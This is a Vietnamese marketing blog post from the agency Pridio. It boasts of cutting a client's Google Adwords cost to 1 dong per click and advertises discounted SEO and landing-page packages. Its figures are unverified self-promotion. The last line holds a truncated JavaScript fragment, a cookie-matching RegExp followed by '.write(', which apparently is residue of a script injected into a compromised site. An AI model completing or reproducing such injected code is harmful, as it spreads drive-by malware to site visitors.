Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Online Advertising > Google Adwords – Tối ưu còn 1đ/click…

Google Adwords – Tối ưu còn 1đ/click…

Nâng cao kỹ thuật quảng cáo Adwords

Các thành viên của Pridio hướng tới phục vụ khách hàng ngày một chuyên nghiệp, tiết kiệm và hiệu quả hơn. Điển hình là ngày hôm qua (11/3), nhóm kỹ thuật đã làm được một chuyện khiến khách hàng sửng sốt:

Tối ưu Google Adwords giúp khách hàng còn 1đ/click, đồng thời rất nhiều từ khoá khác dưới 200đ/click:

Quảng cáo Google Adwords còn 1d/click

Quảng cáo Google Adwords còn 1d/click

Quảng cáo Adwords miễn phí

Chiến dịch đạt được sự tối ưu trên là của một khách hàng rất lớn đang sử dụng dịch vụ SEO với…  hơn 500 keywords. Pridio đã ưu ái miễn phí quản trị chiến dịch quảng cáo và chỉ tính phí click trực tiếp trên các tự khoá mà khách hàng quảng cáo. Số lượng tìm kiếm các từ khoá của khách hàng trên 500 từ khoá này cũng rất lớn, nhưng tỉ lệ click đều khá cao và giá click chỉ rơi vào khoảng dưới 200đ/click.

Khách hàng cho biết, trước đây họ tự làm quảng cáo, click rẻ nhất cũng phải 200đ và đã cảm thấy hài lòng, nhưng từ khi được kỹ thuật của Pridio hỗ trợ tối ưu quảng cáo, giá click còn giảm một cách không ngờ tới, ngân sách tổng thể giảm trong khi số click từ adwords tăng gấp đôi.

Pridio thường xuyên miễn phí quản trị chiến dịch Adwords cho khách hàng làm SEO, chỉ cần khách hàng có tài khoản hoặc tạo mới tài khoản quảng cáo, Pridio sẽ công khai toàn bộ cách quản trị Adwords để khách hàng có thể nắm bắt được giá click và cách tối ưu và quản trị để chiến dịch đạt được kết quả tốt nhất.

Cũng khách hàng trên cho biết, từ khi nhận được tư vấn SEO theo các Landing Page của Pridio, số truy cập vào website tăng vọt kèm theo tỷ lệ CR (Conversion Rate) tăng đáng kể do nói trúng tâm lý của khách hàng. Toàn bộ các landing page này được nhóm copywriting của Pridio thực hiện suốt gần 1 tháng trước và sau tết 2013 vừa qua đang mang hàng loạt đơn hàng cho khách hàng.

SEO hơn 500 keywords giá rẻ!

Ngay từ khi đặt vấn đề SEO, khách hàng trên đã đặt hàng TOÀN BỘ keywords trong lĩnh vực của họ và yêu cầu làm mới 50 landing pages cho các từ khoá đó. Tổng chi phí gói SEO Pridio đã cực kỳ ưu ái chỉ tính phí bằng gói VIP (theo bảng giá SEO đã công bố), ngoài ra khách hàng này còn được ưu đãi:

  • Miễn phí tối ưu và quản trị toàn bộ chiến dịch Google Adwords.
  • Tặng gói dịch vụ copywriting Sói suốt đời theo hợp đồng SEO.
  • Giảm giá theo gói dịch vụ SEO VIP 10% do ký duy trì dài hạn.
  • Giảm giá tới 80% dịch vụ thiết kế landing pages.
  • Cùng rất nhiều ưu đãi dành cho khách hàng hạng “Sói VIP” của Pridio.

Khi làm chiến dịch này, toàn bộ công ty đã rất vất vả, nhưng gần như ai cũng rất vui sướng với những kết quả đang đạt được, thậm chí còn cảm thấy vui sướng hơn cả khách hàng trên!

Hãy liên hệ ngay với những người yêu nghề từ Pridio để có được tư vấn tốt nhất cho chiến dịch online của bạn! (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘